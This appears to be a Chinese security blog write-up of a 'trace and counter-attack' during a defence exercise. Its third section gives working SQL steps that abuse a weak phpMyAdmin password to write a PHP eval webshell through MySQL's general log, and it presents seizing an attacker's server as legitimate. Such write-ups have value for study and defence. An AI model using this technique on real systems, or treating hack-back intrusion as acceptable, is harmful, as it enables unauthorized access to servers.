一次溯源反制全过程

hw结束有一段时间，总结了一些关于护网期间发生的攻击溯源反制的事件来写写。本文章仅供参考，不针对任何厂商及公司。友好交流开始......

某公司在接收某监测设备关于疑似攻击地址通告后，发现有一起历史攻击的攻击源IP属于该通告的IP清单列表。针对该攻击源IP立即组织溯源反制，成功获得攻击方服务器最高操作权限。

一、攻击发现

1.2020年x月x日x分左右，某公司防守队伍根据监测设备的监控日志，监测到外网IP 频繁访问某技术支持系统，并存在攻击行为。

2.通过威胁情报发现该地址为美国idc服务器。

由于hw前期备战阶段特殊性，一些IP可能存在提前踩点行为，某公司立即通过防火墙封禁IP，并将该IP加入情报中心进行持续监控关注。

二、攻击溯源

通过干净的虚拟机和IP尝试访问各开放服务，其中80端口开放，有探针服务。

三、攻击反制

1.通过漏洞扫描发现该IP存在phpmyadmin弱口令漏洞，且同时开放3389服务。

2.使用phpmyadmin后getshell

第一步：set global general_log='on'      # 开启日志

第二步：set global  general_log_file ="探针页面存在物理路径"       # 日志写入的文件

第三步：select "<?php eval($_POST['x'])?>"      # 执行带有一句话的sql语句

漏洞攻击过程截图

命令执行成功

综上，该IP确认为恶意攻击源，通过溯源与反制工作获得攻击方服务器操作权限。

PS：如果觉得本篇文章对您有所帮助，欢迎关注！帮忙点个赞，转发一下 分享出去吧！

本文始发于微信公众号（LSCteam）：护网 | 一次溯源反制全过程